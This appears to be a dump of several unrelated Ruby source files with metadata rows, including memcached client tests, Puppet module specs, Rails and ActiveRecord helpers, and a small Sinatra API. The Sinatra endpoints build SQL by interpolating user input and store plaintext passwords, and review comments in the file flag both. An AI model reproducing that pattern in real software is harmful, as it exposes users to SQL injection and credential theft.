      dc.set("fetch_key", nil)
      executed = false
      res = dc.fetch("fetch_key") {
        executed = true
        "bar"
      }
      assert_equal "bar", res
      assert_equal true, executed
    end
  end

  it "support the cas operation" do
    memcached_persistent do |dc|
      dc.flush

      expected = {"blah" => "blerg!"}

      resp = dc.cas("cas_key") { |value|
        fail("Value it not exist")
      }
      assert_nil resp

      mutated = {"blah" => "foo!"}
      dc.set("cas_key", expected)
      resp = dc.cas("cas_key") { |value|
        assert_equal expected, value
        mutated
      }
      assert op_cas_succeeds(resp)

      resp = dc.get("cas_key")
      assert_equal mutated, resp
    end
  end

  it "support the cas! operation" do
    memcached_persistent do |dc|
      dc.flush

      mutated = {"blah" => "foo!"}
      resp = dc.cas!("cas_key") { |value|
        assert_nil value
        mutated
      }
      assert op_cas_succeeds(resp)

      resp = dc.get("cas_key")
      assert_equal mutated, resp
    end
  end

  it "support multi-get" do
    memcached_persistent do |dc|
      dc.close
      dc.flush
      resp = dc.get_multi(%w[a b c d e f])
      assert_equal({}, resp)

      dc.set("a", "foo")
      dc.set("b", 123)
      dc.set("c", %w[a b c])

      # Invocation without block
      resp = dc.get_multi(%w[a b c d e f])
      expected_resp = {"a" => "foo", "b" => 123, "c" => %w[a b c]}
      assert_equal(expected_resp, resp)

      # Invocation with block
      dc.get_multi(%w[a b c d e f]) do |k, v|
        assert(expected_resp.has_key?(k) && expected_resp[k] == v)
        expected_resp.delete(k)
      end
      assert expected_resp.empty?

      # Perform a big multi-get with 1000 elements.
      arr = []
      dc.multi do
        1000.times do |idx|
          dc.set idx, idx
          arr << idx
        end
      end

      result = dc.get_multi(arr)
      assert_equal(1000, result.size)
      assert_equal(50, result["50"])
    end
  end

  it "support raw incr/decr" do
    memcached_persistent do |client|
      client.flush

      assert op_addset_succeeds(client.set("fakecounter", 0, 0, raw: true))
      assert_equal 1, client.incr("fakecounter", 1)
      assert_equal 2, client.incr("fakecounter", 1)
      assert_equal 3, client.incr("fakecounter", 1)
      assert_equal 1, client.decr("fakecounter", 2)
      assert_equal "1", client.get("fakecounter", raw: true)

      resp = client.incr("mycounter", 0)
      assert_nil resp

      resp = client.incr("mycounter", 1, 0, 2)
      assert_equal 2, resp
      resp = client.incr("mycounter", 1)
      assert_equal 3, resp

      resp = client.set("rawcounter", 10, 0, raw: true)
      assert op_cas_succeeds(resp)

      resp = client.get("rawcounter", raw: true)
      assert_equal "10", resp

      resp = client.incr("rawcounter", 1)
      assert_equal 11, resp
    end
  end

  it "support incr/decr operations" do
    memcached_persistent do |dc|
      dc.flush

      resp = dc.decr("counter", 100, 5, 0)
      assert_equal 0, resp

      resp = dc.decr("counter", 10)
      assert_equal 0, resp

      resp = dc.incr("counter", 10)
      assert_equal 10, resp

      current = 10
      100.times do |x|
        resp = dc.incr("counter", 10)
        assert_equal current + ((x + 1) * 10), resp
      end

      resp = dc.decr("10billion", 0, 5, 10)
      # go over the 32-bit mark to verify proper (un)packing
      resp = dc.incr("10billion", 10_000_000_000)
      assert_equal 10_000_000_010, resp

      resp = dc.decr("10billion", 1)
      assert_equal 10_000_000_009, resp

      resp = dc.decr("10billion", 0)
      assert_equal 10_000_000_009, resp

      resp = dc.incr("10billion", 0)
      assert_equal 10_000_000_009, resp

      assert_nil dc.incr("DNE", 10)
      assert_nil dc.decr("DNE", 10)

      resp = dc.incr("big", 100, 5, 0xFFFFFFFFFFFFFFFE)
      assert_equal 0xFFFFFFFFFFFFFFFE, resp
      resp = dc.incr("big", 1)
      assert_equal 0xFFFFFFFFFFFFFFFF, resp

      # rollover the 64-bit value, we'll get something undefined.
      resp = dc.incr("big", 1)
      refute_equal 0x10000000000000000, resp

      dc.reset
    end
  end

  it "support the append and prepend operations" do
    memcached_persistent do |dc|
      dc.flush

      assert op_addset_succeeds(dc.set("456", "xyz", 0, raw: true))
      assert_equal true, dc.prepend("456", "0")
      assert_equal true, dc.append("456", "9")
      assert_equal "0xyz9", dc.get("456", raw: true)
      assert_equal "0xyz9", dc.get("456")

      assert_equal false, dc.append("nonexist", "abc")
      assert_equal false, dc.prepend("nonexist", "abc")
    end
  end

  it "supports replace operation" do
    memcached_persistent do |dc|
      dc.flush
      dc.set("key", "value")
      assert op_replace_succeeds(dc.replace("key", "value2"))

      assert_equal "value2", dc.get("key")
    end
  end

  it "support touch operation" do
    memcached_persistent do |dc|
      dc.flush
      dc.set "key", "value"
      assert_equal true, dc.touch("key", 10)
      assert_equal true, dc.touch("key")
      assert_equal "value", dc.get("key")
      assert_nil dc.touch("notexist")
    rescue Dalli::DalliError => e
      # This will happen when memcached is in lesser version than 1.4.8
      assert_equal "Response error 129: Unknown command", e.message
    end
  end

  it "support gat operation" do
    memcached_persistent do |dc|
      dc.flush
      dc.set "key", "value"
      assert_equal "value", dc.gat("key", 10)
      assert_equal "value", dc.gat("key")
      assert_nil dc.gat("notexist", 10)
    rescue Dalli::DalliError => e
      # This will happen when memcached is in lesser version than 1.4.8
      assert_equal "Response error 129: Unknown command", e.message
    end
  end

  it "support version operation" do
    memcached_persistent do |dc|
      v = dc.version
      servers = v.keys
      assert(servers.any? { |s|
        !v[s].nil?
      }, "version failed")
    end
  end

  it "allow TCP connections to be configured for keepalive" do
    memcached_persistent do |_, port|
      dc = Dalli::Client.new("localhost:#{port}", keepalive: true)
      dc.set(:a, 1)
      ring = dc.send(:ring)
      server = ring.servers.first
      socket = server.instance_variable_get("@sock")

      optval = socket.getsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE)
      optval = optval.unpack "i"

      assert_equal true, (optval[0] != 0)
    end
  end

  it "pass a simple smoke test" do
    memcached_persistent do |dc, port|
      resp = dc.flush
      refute_nil resp
      assert_equal [true, true], resp

      assert op_addset_succeeds(dc.set(:foo, "bar"))
      assert_equal "bar", dc.get(:foo)

      resp = dc.get("123")
      assert_nil resp

      assert op_addset_succeeds(dc.set("123", "xyz"))

      resp = dc.get("123")
      assert_equal "xyz", resp

      assert op_addset_succeeds(dc.set("123", "abc"))

      # Corrupt the marshalled value so the next typed get fails to decode.
      dc.prepend("123", "0")
      dc.append("123", "0")

      assert_raises Dalli::UnmarshalError do
        resp = dc.get("123")
      end

      dc.close
      dc = nil

      dc = Dalli::Client.new("localhost:#{port}", digest_class: ::OpenSSL::Digest::SHA1)

      assert op_addset_succeeds(dc.set("456", "xyz", 0, raw: true))

      resp = dc.prepend "456", "0"
      assert_equal true, resp

      resp = dc.append "456", "9"
      assert_equal true, resp

      resp = dc.get("456", raw: true)
      assert_equal "0xyz9", resp

      assert op_addset_succeeds(dc.set("456", false))

      resp = dc.get("456")
      assert_equal false, resp

      resp = dc.stats
      assert_equal Hash, resp.class

      dc.close
    end
  end

  it "pass a simple smoke test on unix socket" do
    memcached_persistent(MemcachedMock::UNIX_SOCKET_PATH) do |dc, path|
      resp = dc.flush
      refute_nil resp
      assert_equal [true], resp

      assert op_addset_succeeds(dc.set(:foo, "bar"))
      assert_equal "bar", dc.get(:foo)

      resp = dc.get("123")
      assert_nil resp

      assert op_addset_succeeds(dc.set("123", "xyz"))

      resp = dc.get("123")
      assert_equal "xyz", resp

      assert op_addset_succeeds(dc.set("123", "abc"))

      dc.prepend("123", "0")
      dc.append("123", "0")

      assert_raises Dalli::UnmarshalError do
        resp = dc.get("123")
      end

      dc.close
      dc = nil

      dc = Dalli::Client.new(path)

      assert op_addset_succeeds(dc.set("456", "xyz", 0, raw: true))

      resp = dc.prepend "456", "0"
      assert_equal true, resp

      resp = dc.append "456", "9"
      assert_equal true, resp

      resp = dc.get("456", raw: true)
      assert_equal "0xyz9", resp

      assert op_addset_succeeds(dc.set("456", false))

      resp = dc.get("456")
      assert_equal false, resp

      resp = dc.stats
      assert_equal Hash, resp.class

      dc.close
    end
  end

  it "support multithreaded access" do
    memcached_persistent do |cache|
      cache.flush
      workers = []

      cache.set("f", "zzz")
      assert op_cas_succeeds((cache.cas("f") { |value|
        value << "z"
      }))
      assert_equal "zzzz", cache.get("f")

      # Have a bunch of threads perform a bunch of operations at the same time.
      # Verify the result of each operation to ensure the request and response
      # are not intermingled between threads.
      10.times do
        workers << Thread.new {
          100.times do
            cache.set("a", 9)
            cache.set("b", 11)
            cache.incr("cat", 10, 0, 10)
            cache.set("f", "zzz")
            res = cache.cas("f") { |value|
              value << "z"
            }
            refute_nil res
            assert_equal false, cache.add("a", 11)
            assert_equal({"a" => 9, "b" => 11}, cache.get_multi(["a", "b"]))
            inc = cache.incr("cat", 10)
            assert_equal 0, inc % 5
            cache.decr("cat", 5)
            assert_equal 11, cache.get("b")

            assert_equal %w[a b], cache.get_multi("a", "b", "c").keys.sort
          end
        }
      end

      workers.each { |w| w.join }
      cache.flush
    end
  end

  it "handle namespaced keys" do
    memcached_persistent do |_, port|
      dc = Dalli::Client.new("localhost:#{port}", namespace: "a")
      dc.set("namespaced", 1)
      dc2 = Dalli::Client.new("localhost:#{port}", namespace: "b")
      dc2.set("namespaced", 2)
      assert_equal 1, dc.get("namespaced")
      assert_equal 2, dc2.get("namespaced")
    end
  end

  it "handle nil namespace" do
    memcached_persistent do |_, port|
      dc = Dalli::Client.new("localhost:#{port}", namespace: nil)
      assert_equal "key", dc.send(:validate_key, "key")
    end
  end

  it "truncate cache keys that are too long" do
    memcached_persistent do |_, port|
      dc = Dalli::Client.new("localhost:#{port}", namespace: "some:namspace")
      key = "this cache key is far too long so it must be hashed and truncated and stuff" * 10
      value = "some value"
      assert op_addset_succeeds(dc.set(key, value))
      assert_equal value, dc.get(key)
    end
  end

  it "handle namespaced keys in multi_get" do
    memcached_persistent do |_, port|
      dc = Dalli::Client.new("localhost:#{port}", namespace: "a")
      dc.set("a", 1)
      dc.set("b", 2)
      assert_equal({"a" => 1, "b" => 2}, dc.get_multi("a", "b"))
    end
  end

  it "handle special Regexp characters in namespace with get_multi" do
    memcached_persistent do |_, port|
      # /(?!)/ is a contradictory PCRE and should never be able to match
      dc = Dalli::Client.new("localhost:#{port}", namespace: "(?!)")
      dc.set("a", 1)
      dc.set("b", 2)
      assert_equal({"a" => 1, "b" => 2}, dc.get_multi("a", "b"))
    end
  end

  it "handle application marshalling issues" do
    memcached_persistent do |dc|
      with_nil_logger do
        assert_raises Dalli::MarshalError do
          dc.set("a", proc { true })
        end
      end
    end
  end

  describe "with compression" do
    it "does not allow large values" do
      memcached_persistent do |dc|
        value = SecureRandom.random_bytes(1024 * 1024 + 30_000)
        with_nil_logger do
          assert_raises Dalli::ValueOverMaxSize do
            dc.set("verylarge", value)
          end
        end
      end
    end

    it "allow large values to be set" do
      memcached_persistent do |dc|
        value = "0" * 1024 * 1024
        assert dc.set("verylarge", value, nil, compress: true)
      end
    end
  end
end
end
| 27.967871 | 96 | 0.572564 |
bf28f3bd677144ef250dfa02e89cd427b093447c | 1,421 | require_relative 'modules/dbhandler'
# Minimal Sinatra API backed by the DBhandler module: user creation/login
# plus read-only listings for posts, comments, and roles.
class App < Sinatra::Base
  register Sinatra::Reloader

  # Serves the static test page.
  get '/test' do
    File.read(File.join('public', 'testing.html'))
  end

  post '/test' do
    redirect '/test'
  end

  # Lists user names from the users table.
  get '/api/users' do
    DBhandler.get("users", "name")
  end

  # Creates a user when the name is not already taken.
  # NOTE(review): user-controlled input is interpolated directly into SQL
  # ("WHERE name = '#{inputname}'") — SQL injection risk; switch DBhandler
  # to parameterized queries before using real input.
  # NOTE(review): passwords are stored and compared in plaintext — hash them
  # (e.g. with BCrypt) before storing.
  post '/api/create-user' do
    # for testing purposes
    inputname = "test"
    inputpwd = "go"
    if DBhandler.get("users","name", "WHERE name = '#{inputname}'").length < 1
      DBhandler.insert("users", "'name', 'password'", [inputname, inputpwd])
      # TODO revise returned response
      return 200
    else
      #TODO create proper error message
      return 400
    end
  end

  # Verifies the name/password pair; same injection and plaintext-password
  # caveats as /api/create-user above.
  post '/api/login' do
    #for testing purposes
    inputname = "test"
    inputpwd = "go"
    user = DBhandler.get("users","name, password", "WHERE name = '#{inputname}'")
    if user.length == 1 && user.first["password"] == inputpwd
      # TODO revise returned response
      return 200
    else
      #TODO create proper error message
      return 400
    end
  end

  # Read-only table dumps.
  get '/api/posts' do
    DBhandler.get("posts", "*")
  end

  get '/api/comments' do
    DBhandler.get("comments", "*")
  end

  get '/api/roles' do
    DBhandler.get("roles", "*")
  end
end
91e07edfb6634143713fd7277e8360e25efe7ff0 | 1,731 | module WebMock
# Verifier that checks how many times a registered request pattern was
# actually executed, and renders the corresponding positive and negative
# failure messages for test expectations.
class RequestExecutionVerifier
  attr_accessor :request_pattern, :expected_times_executed, :times_executed

  # @param request_pattern          pattern whose executions are counted
  # @param expected_times_executed  expected execution count; nil means
  #                                 "exactly once" for #matches? and
  #                                 "never" for #does_not_match?
  def initialize(request_pattern = nil, expected_times_executed = nil)
    @request_pattern = request_pattern
    @expected_times_executed = expected_times_executed
  end

  # True when the registry's count for the pattern equals the expectation
  # (defaulting to 1 when none was given). Caches the count in
  # #times_executed for use by the failure messages.
  def matches?
    refresh_times_executed == (@expected_times_executed || 1)
  end

  # Negative check: with an explicit expectation, true when the actual count
  # differs from it; without one, true only when the request never executed.
  def does_not_match?
    actual = refresh_times_executed
    if @expected_times_executed
      actual != @expected_times_executed
    else
      actual.zero?
    end
  end

  # Message shown when the positive expectation fails.
  def failure_message
    expected = @expected_times_executed || 1
    message = "The request #{request_pattern} was expected to execute #{times(expected)} but it executed #{times(times_executed)}"
    message << self.class.executed_requests_message
  end

  # Message shown when the negative expectation fails.
  def failure_message_when_negated
    message =
      if @expected_times_executed
        "The request #{request_pattern} was not expected to execute #{times(expected_times_executed)} but it executed #{times(times_executed)}"
      else
        "The request #{request_pattern} was expected to execute 0 times but it executed #{times(times_executed)}"
      end
    message << self.class.executed_requests_message
  end

  # Appendix listing every request the registry recorded.
  def self.executed_requests_message
    "\n\nThe following requests were made:\n\n#{RequestRegistry.instance}\n" + "=" * 60
  end

  private

  # Pulls the current execution count from the global registry, storing it
  # in #times_executed as a side effect, and returns it.
  def refresh_times_executed
    self.times_executed = RequestRegistry.instance.times_executed(@request_pattern)
  end

  # Pluralizing helper: "1 time", "3 times".
  def times(count)
    "#{count} time#{count == 1 ? '' : 's'}"
  end
end
end
| 30.368421 | 151 | 0.69844 |
5d404e32c4b74f557a69950efd8efa6e03af5312 | 500 |
require 'etc'
module Enkaironment
  # Convenience wrappers around the stdlib Etc passwd-database lookups.
  module EtcMethods
    # Tests whether a system user exists.
    #
    # @param username [String, Integer] the UID (numeric) or login name of a user
    # @return [Boolean] true when the passwd database has a matching entry
    def user_exists?(username)
      # Numeric arguments are looked up by UID, anything else by login name;
      # Etc raises ArgumentError when no matching entry exists.
      lookup = username.is_a?(Numeric) ? :getpwuid : :getpwnam
      !Etc.public_send(lookup, username).nil?
    rescue ArgumentError
      false
    end
  end
end
| 26.315789 | 77 | 0.684 |
bb1d2db54ddfaf9e772a7f75ebbdc883774b1e96 | 924 | class Clearance::SessionsController < ApplicationController
# The sign-in/sign-out actions themselves must be reachable without an
# authorized session.
skip_before_filter :authorize, :only => [:create, :new, :destroy]
protect_from_forgery :except => :create
# Signs a user in. Re-renders the sign-in form with 401 Unauthorized when
# the submitted credentials do not authenticate.
def create
@user = authenticate(params)
if @user.nil?
flash_failure_after_create
render :template => 'sessions/new', :status => :unauthorized
else
sign_in @user
redirect_back_or url_after_create
end
end
# Signs the current user out and redirects away.
def destroy
sign_out
redirect_to url_after_destroy
end
# Renders the sign-in form.
def new
render :template => 'sessions/new'
end
private
# Flash message shown when authentication fails; falls back to the
# generic failure translation when no Clearance-specific one exists.
def flash_failure_after_create
flash.now[:notice] = translate(:bad_email_or_password,
:scope => [:clearance, :controllers, :sessions],
:default => t('flashes.failure_after_create', :sign_up_path => sign_up_path).html_safe)
end
# Post-sign-in destination, taken from the Clearance configuration.
def url_after_create
Clearance.configuration.redirect_url
end
# Post-sign-out destination: back to the sign-in page.
def url_after_destroy
sign_in_url
end
end
| 22 | 93 | 0.707792 |
f86965419f21fddb7426df3ed1ff4ae7fb09c3de | 4,275 | module Switchman
module ActiveRecord
# Shard-awareness mixin prepended into ActiveRecord::Relation: every
# relation carries a shard (and how that shard was chosen), and query
# execution is routed through shard activation.
module Relation
# Register :shard and :shard_source as single-value relation attributes.
def self.prepended(klass)
klass::SINGLE_VALUE_METHODS.concat [ :shard, :shard_source ]
end
# Default a fresh relation to the current shard for the model's shard
# category, and mark that choice as implicit (not caller-specified).
def initialize(*args)
super
self.shard_value = Shard.current(klass ? klass.shard_category : :primary) unless shard_value
self.shard_source_value = :implicit unless shard_source_value
end
def clone
result = super
# NOTE(review): the guard reads `shard_value` on self (which initialize
# always sets), not on `result` — `unless result.shard_value` looks like
# the intent; confirm before relying on this branch.
result.shard_value = Shard.current(klass ? klass.shard_category : :primary) unless shard_value
result
end
# When merging, an explicitly-chosen shard on self wins over a merely
# implicit shard on the merged relation.
def merge(*args)
relation = super
if relation.shard_value != self.shard_value && relation.shard_source_value == :implicit
relation.shard_value = self.shard_value
relation.shard_source_value = self.shard_source_value
end
relation
end
# Instantiation and SQL generation run on the relation's primary shard.
def new(*args, &block)
primary_shard.activate(klass.shard_category) { super }
end
def create(*args, &block)
primary_shard.activate(klass.shard_category) { super }
end
def create!(*args, &block)
primary_shard.activate(klass.shard_category) { super }
end
def to_sql
primary_shard.activate(klass.shard_category) { super }
end
# Run EXPLAIN with the relation's shard(s) activated.
def explain
self.activate { |relation| relation.call_super(:explain, Relation) }
end
# Load records with the shard(s) activated; only cache them on the
# relation when the shard value is a concrete collection/relation/record.
def records
return @records if loaded?
results = self.activate { |relation| relation.call_super(:records, Relation) }
case shard_value
when Array, ::ActiveRecord::Relation, ::ActiveRecord::Base
@records = results
@loaded = true
end
results
end
# update_all/delete_all run per shard; summing the per-shard results
# yields the total affected-row count.
%I{update_all delete_all}.each do |method|
class_eval <<-RUBY, __FILE__, __LINE__ + 1
def #{method}(*args)
result = self.activate { |relation| relation.call_super(#{method.inspect}, Relation, *args) }
result = result.sum if result.is_a?(Array)
result
end
RUBY
end
# Yields successive [min_id, max_id] primary-key ranges of at most
# batch_size ids, computed with SQL MIN/MAX over limited subqueries so
# the table is never fully scanned client-side.
def find_ids_in_ranges(options = {})
is_integer = columns_hash[primary_key.to_s].type == :integer
loose_mode = options[:loose] && is_integer
# loose_mode: if we don't care about getting exactly batch_size ids in between
# don't get the max - just get the min and add batch_size so we get that many _at most_
values = loose_mode ? "MIN(id)" : "MIN(id), MAX(id)"
batch_size = options[:batch_size].try(:to_i) || 1000
quoted_primary_key = "#{klass.connection.quote_local_table_name(table_name)}.#{klass.connection.quote_column_name(primary_key)}"
as_id = " AS id" unless primary_key == 'id'
subquery_scope = except(:select).select("#{quoted_primary_key}#{as_id}").reorder(primary_key.to_sym).limit(loose_mode ? 1 : batch_size)
subquery_scope = subquery_scope.where("#{quoted_primary_key} <= ?", options[:end_at]) if options[:end_at]
first_subquery_scope = options[:start_at] ? subquery_scope.where("#{quoted_primary_key} >= ?", options[:start_at]) : subquery_scope
ids = connection.select_rows("SELECT #{values} FROM (#{first_subquery_scope.to_sql}) AS subquery").first
# MIN/MAX always return one row; an exhausted range yields [nil, ...],
# which ends the loop via present?.
while ids.first.present?
ids.map!(&:to_i) if is_integer
ids << ids.first + batch_size if loose_mode
yield(*ids)
last_value = ids.last
next_subquery_scope = subquery_scope.where(["#{quoted_primary_key}>?", last_value])
ids = connection.select_rows("SELECT #{values} FROM (#{next_subquery_scope.to_sql}) AS subquery").first
end
end
# Runs the block once per shard the relation spans. Single-shard
# relations take a fast path (activating only when the target shard is
# not already current); multi-shard relations iterate every shard.
def activate(&block)
shards = all_shards
if (Array === shards && shards.length == 1)
if shards.first == DefaultShard || shards.first == Shard.current(klass.shard_category)
yield(self, shards.first)
else
shards.first.activate(klass.shard_category) { yield(self, shards.first) }
end
else
# TODO: implement local limit to avoid querying extra shards
Shard.with_each_shard(shards, [klass.shard_category]) do
shard(Shard.current(klass.shard_category), :to_a).activate(&block)
end
end
end
end
end
end
| 36.853448 | 143 | 0.633684 |
1160defd51faef8457d0a938662dbfd635b71042 | 218 | # Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
# Register the :text attribute type (backed by ActiveRecord::Type::Text) so it
# can be referenced by name in `attribute` declarations; `override: false`
# preserves any registration Rails already made under the same name.
ActiveModel::Type.register(:text, ActiveRecord::Type::Text, override: false)
| 43.6 | 84 | 0.766055 |
f8223d2daba9fcd9e0ace7bc9cc243b73f0d5134 | 11,416 | require 'spec_helper'
describe 'python' do
on_supported_os.each do |os, facts|
next if os == 'gentoo-3-x86_64'
context "on #{os}" do
let :facts do
facts
end
context 'with defaults' do
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_class('python::install') }
it { is_expected.to contain_class('python::params') }
it { is_expected.to contain_class('python::config') }
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('pip') }
end
context 'without managing things' do
let :params do
{
manage_python_package: false,
manage_pip_package: false
}
end
it { is_expected.to compile.with_all_deps }
it { is_expected.not_to contain_package('python') }
it { is_expected.not_to contain_package('pip') }
end
case facts[:os]['family']
when 'Debian'
# tests were written for Debian 6
context 'on Debian OS' do
it { is_expected.to contain_class('python::install') }
# Base debian packages.
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('python-dev') }
it { is_expected.to contain_package('pip') }
describe 'with python::version' do
context 'python3.7' do
let(:params) { { version: 'python3.7' } }
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('pip').with_name('python3.7-pip') }
it { is_expected.to contain_package('python').with_name('python3.7') }
it { is_expected.to contain_package('python-dev').with_name('python3.7-dev') }
end
end
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'empty/default' do
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'without python::dev' do
context 'empty/default' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'with python::python_pyvenvs' do
context 'with two pyenvs' do
let(:params) do
{
python_pyvenvs: {
'/opt/env1' => {
version: '3.8'
},
'/opt/env2' => {
version: '3.8'
}
}
}
end
it { is_expected.to compile }
it { is_expected.to contain_python__pyvenv('/opt/env1').with_ensure('present') }
it { is_expected.to contain_python__pyvenv('/opt/env2').with_ensure('present') }
it { is_expected.to contain_exec('python_virtualenv_/opt/env1') }
it { is_expected.to contain_exec('python_virtualenv_/opt/env2') }
it { is_expected.to contain_file('/opt/env1') }
it { is_expected.to contain_file('/opt/env2') }
end
end
describe 'with manage_gunicorn' do
context 'true' do
let(:params) { { manage_gunicorn: true } }
it { is_expected.to contain_package('gunicorn') }
end
context 'empty args' do
# let(:params) {{ :manage_gunicorn => '' }}
it { is_expected.to contain_package('gunicorn') }
end
context 'false' do
let(:params) { { manage_gunicorn: false } }
it { is_expected.not_to contain_package('gunicorn') }
end
end
describe 'with python::provider' do
context 'pip' do
let(:params) { { pip: 'present', provider: 'pip' } }
it { is_expected.to contain_package('pip').with('provider' => 'pip') }
end
# python::provider
context 'default' do
let(:params) { { provider: '' } }
it { is_expected.to contain_package('pip') }
end
end
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'default/empty' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'EPEL does not exist for Debian' do
context 'default/empty' do
it { is_expected.not_to contain_class('epel') }
end
end
end
when 'RedHat'
case facts[:os]['name']
when 'Fedora'
# written for Fedora 22
context 'on a Fedora OS' do
describe 'EPEL does not exist for Fedora' do
context 'default/empty' do
it { is_expected.not_to contain_class('epel') }
end
end
end
when 'RedHat', 'CentOS'
case facts[:os]['release']['major']
when '7'
context 'on a Redhat 7 OS' do
it { is_expected.to contain_class('python::install') }
it { is_expected.to contain_package('pip').with_name('python2-pip') }
describe 'with python::version' do
context 'python36' do
let(:params) { { version: 'python36' } }
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('pip').with_name('python36-pip') }
it { is_expected.to contain_package('python').with_name('python36') }
it { is_expected.to contain_package('python-dev').with_name('python36-devel') }
end
end
describe 'with python::provider' do
context 'scl' do
describe 'with version' do
context '3.6 SCL meta package' do
let(:params) { { version: 'rh-python36' } }
it { is_expected.to compile.with_all_deps }
end
context '3.6 SCL python package' do
let(:params) { { version: 'rh-python36-python' } }
it { is_expected.to compile.with_all_deps }
end
end
describe 'with manage_scl' do
context 'true' do
let(:params) { { provider: 'scl', manage_scl: true } }
it { is_expected.to contain_package('centos-release-scl') }
it { is_expected.to contain_package('scl-utils') }
end
context 'false' do
let(:params) { { provider: 'scl', manage_scl: false } }
it { is_expected.not_to contain_package('centos-release-scl') }
it { is_expected.not_to contain_package('scl-utils') }
end
end
end
end
end
end
end
when 'Suse'
# written for SLES 11 SP3
context 'on a SLES 11 SP3' do
it { is_expected.to contain_class('python::install') }
# Base Suse packages.
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('python-dev').with_name('python3-devel') }
it { is_expected.to contain_package('python-dev').with_alias('python3-devel') }
it { is_expected.to contain_package('pip') }
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'empty/default' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'with manage_gunicorn' do
context 'true' do
let(:params) { { manage_gunicorn: true } }
it { is_expected.to contain_package('gunicorn') }
end
context 'empty args' do
# let(:params) {{ :manage_gunicorn => '' }}
it { is_expected.to contain_package('gunicorn') }
end
context 'false' do
let(:params) { { manage_gunicorn: false } }
it { is_expected.not_to contain_package('gunicorn') }
end
end
describe 'with python::provider' do
context 'pip' do
let(:params) { { provider: 'pip' } }
it {
is_expected.to contain_package('pip').with(
'provider' => 'pip'
)
}
end
# python::provider
context 'default' do
let(:params) { { provider: '' } }
it { is_expected.to contain_package('pip') }
end
end
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'default/empty' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'EPEL does not exist on Suse' do
context 'default/empty' do
it { is_expected.not_to contain_class('epel') }
end
end
end
when 'Gentoo'
context 'on a Gentoo OS' do
it { is_expected.to contain_class('python::install') }
# Base debian packages.
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('pip').with('category' => 'dev-python') }
# Python::Dev
it { is_expected.not_to contain_package('python-dev') }
describe 'with manage_gunicorn' do
context 'true' do
let(:params) { { manage_gunicorn: true } }
it { is_expected.to contain_package('gunicorn') }
end
context 'empty args' do
# let(:params) {{ :manage_gunicorn => '' }}
it { is_expected.to contain_package('gunicorn') }
end
context 'false' do
let(:params) { { manage_gunicorn: false } }
it { is_expected.not_to contain_package('gunicorn') }
end
end
describe 'with python::provider' do
context 'pip' do
let(:params) { { pip: 'present', provider: 'pip' } }
it { is_expected.to contain_package('pip').with('provider' => 'pip') }
end
end
end
end
end
end
end
| 35.018405 | 97 | 0.507708 |
38d135d9f386689c1bbbd10af8db4e4573e4f3cf | 1,895 | module PageSerializer
# Base serializer for search result pages: holds the query, results and
# pagination state, and supplies the shared heading + search-form section.
class SearchPage < PageSerializer::BasePageSerializer
# Initialise a Search index page serializer.
#
# @param [ActionDispatch::Request] request the current request object.
# @param [String] opensearch_description_url a description url for the search.
# @param [String] query a query string used for the search.
# @param [Array<Object>] results an array of objects used for displaying results.
# @param [Hash] pagination_hash a hash containing data used for pagination.
# @param [String] flash_message a translation block that is evaluated into a flash message.
def initialize(request: nil, opensearch_description_url: nil, query: nil, results: nil, pagination_hash: nil, flash_message: nil)
@opensearch_description_url = opensearch_description_url
@query = query
@results = results
@pagination_helper = PaginationHelper.new(pagination_hash) if pagination_hash
@flash_message = flash_message
super(request: request, data_alternates: nil)
end
private
attr_reader :opensearch_description_url
# Abstract hook: subclasses must supply the page's component list.
# NOTE(review): NotImplementedError is the conventional class for this, but
# swapping it would change what callers rescuing StandardError catch.
def content
raise StandardError, 'You must implement #content'
end
# Builds the heading plus search-form components shown at the top of the page.
def section_primary_components(heading_content, context_content = nil, context_hidden = nil)
[].tap do |content|
content << ComponentSerializer::Heading1ComponentSerializer.new(heading: heading_content, context: context_content, context_hidden: context_hidden).to_h
content << ComponentSerializer::SearchFormComponentSerializer.new(query: @query, components: [ComponentSerializer::SearchIconComponentSerializer.new.to_h]).to_h
end
end
# Total result count; a nil @results safely coerces to 0 via nil.to_i.
def total_results
@results&.totalResults.to_i
end
# Overrides the default of true (found in the base page serializer) for including global search in the header.
def include_global_search
false
end
end
end
| 41.195652 | 168 | 0.743536 |
28f1cfc97cb683f0e0240c350161c703482279c4 | 4,323 | require "#{File.dirname(__FILE__)}/../abstract_unit"
require "fixtures/person"
require "fixtures/street_address"
module Highrise
class Note < ActiveResource::Base
self.site = "http://37s.sunrise.i:3000"
end
class Comment < ActiveResource::Base
self.site = "http://37s.sunrise.i:3000"
end
end
class BaseLoadTest < Test::Unit::TestCase
def setup
@matz = { :id => 1, :name => 'Matz' }
@first_address = { :id => 1, :street => '12345 Street' }
@addresses = [@first_address, { :id => 2, :street => '67890 Street' }]
@addresses_from_xml = { :street_addresses => @addresses }
@addresses_from_xml_single = { :street_addresses => [ @first_address ] }
@deep = { :id => 1, :street => {
:id => 1, :state => { :id => 1, :name => 'Oregon',
:notable_rivers => [
{ :id => 1, :name => 'Willamette' },
{ :id => 2, :name => 'Columbia', :rafted_by => @matz }] }}}
@person = Person.new
end
def test_load_expects_hash
